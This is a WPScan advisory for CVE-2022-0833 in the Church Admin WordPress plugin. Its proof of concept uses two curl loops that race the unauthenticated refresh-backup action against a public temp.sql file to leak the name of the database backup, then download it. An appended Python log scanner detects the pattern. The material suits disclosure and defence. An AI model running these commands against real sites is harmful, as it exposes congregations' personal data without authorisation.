WPScan

WordPress Plugin Vulnerabilities

Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure

Description

The plugin does not have authorisation and CSRF checks in some of its actions, and some of the files it generates are served without access control. Unauthenticated attackers can repeatedly request the "refresh-backup" action while simultaneously requesting a publicly accessible temporary file generated by the plugin; that file discloses the final backup filename, which can then be fetched to download the backup of the plugin's database data.

Proof of Concept

1. In one terminal, continuously fetch from http://127.0.0.1:8080/?action=refresh-backup:

while true; do curl -s 'http://127.0.0.1:8080/?action=refresh-backup' >/dev/null; done

2. In a second terminal, continuously fetch from /wp-content/uploads/church-admin-cache/temp.sql:

while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep '\.sql\.gz'; done

3. After a while, the backup filename should be found by the curl | grep command in the second terminal. Once found, abort the command in terminal one first, then the one in the second terminal, and use the last output of the second terminal as the filename (<md5-hash>.sql.gz).

4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/<extracted-md5-hash>.sql.gz
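As an added defensive example (not part of the WPScan advisory or the plugin's own code), the following Python scans web-server access logs for the request pattern this disclosure produces: repeated unauthenticated refresh-backup requests from one client, polling of temp.sql, and a successful download of a 32-hex-character .sql.gz file from the church-admin-cache directory. The log lines, client IPs and hash are constructed, and the refresh threshold is an assumption to tune per site.

```python
import re
from collections import defaultdict

# Constructed access-log lines (combined log format); the IPs are documentation
# addresses and the hash is a made-up placeholder, not data from a real incident.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Mar/2022:10:00:01 +0000] "GET /?action=refresh-backup HTTP/1.1" 200 512 "-" "curl/7.81.0"
203.0.113.7 - - [07/Mar/2022:10:00:01 +0000] "GET /wp-content/uploads/church-admin-cache/temp.sql HTTP/1.1" 404 0 "-" "curl/7.81.0"
203.0.113.7 - - [07/Mar/2022:10:00:02 +0000] "GET /?action=refresh-backup HTTP/1.1" 200 512 "-" "curl/7.81.0"
203.0.113.7 - - [07/Mar/2022:10:00:02 +0000] "GET /wp-content/uploads/church-admin-cache/temp.sql HTTP/1.1" 200 96 "-" "curl/7.81.0"
203.0.113.7 - - [07/Mar/2022:10:00:03 +0000] "GET /?action=refresh-backup HTTP/1.1" 200 512 "-" "curl/7.81.0"
203.0.113.7 - - [07/Mar/2022:10:00:05 +0000] "GET /wp-content/uploads/church-admin-cache/0123456789abcdef0123456789abcdef.sql.gz HTTP/1.1" 200 18432 "-" "curl/7.81.0"
198.51.100.2 - - [07/Mar/2022:10:05:00 +0000] "GET /?action=refresh-backup HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.2 - - [07/Mar/2022:10:05:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, method, request path, status.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
CACHE_DIR = "/wp-content/uploads/church-admin-cache/"
# The disclosed backup name is an MD5 hex digest followed by .sql.gz.
BACKUP_RE = re.compile(re.escape(CACHE_DIR) + r"[0-9a-f]{32}\.sql\.gz$")

def analyse(log_text, refresh_threshold=3):
    """Return {ip: [reasons]} for clients whose requests match the disclosure pattern.
    refresh_threshold is an assumed tuning value: a legitimate admin triggers a backup
    refresh once, an unauthenticated loop triggers it many times per second."""
    stats = defaultdict(lambda: {"refresh": 0, "temp_polls": 0, "backup_downloads": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed or truncated lines
        ip, path, status = m["ip"], m["path"], int(m["status"])
        if "action=refresh-backup" in path:
            stats[ip]["refresh"] += 1
        elif path == CACHE_DIR + "temp.sql":
            stats[ip]["temp_polls"] += 1
        elif BACKUP_RE.match(path) and status == 200:
            stats[ip]["backup_downloads"].append(path.rsplit("/", 1)[1])
    findings = {}
    for ip, s in stats.items():
        reasons = []
        if s["refresh"] >= refresh_threshold and s["temp_polls"] > 0:
            reasons.append("repeated refresh-backup with temp.sql polling")
        if s["backup_downloads"]:
            reasons.append("backup archive downloaded: " + ", ".join(s["backup_downloads"]))
        if reasons:
            findings[ip] = reasons
    return findings

if __name__ == "__main__":
    for ip, reasons in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

A successful 200 on a .sql.gz under church-admin-cache is the strongest signal and should be treated as a confirmed data exposure, whatever the request rate; the rate-based rule catches attempts that never reached that point.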

Affects Plugins

church-admin
Fixed in version 3.4.135

References

CVE
CVE-2022-0833

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
b2c7c1e8-d72c-4b1e-b5cb-dc2a6538965d

Timeline

Publicly Published

2022-03-07

Added

2022-03-07

Last Updated

2022-04-08
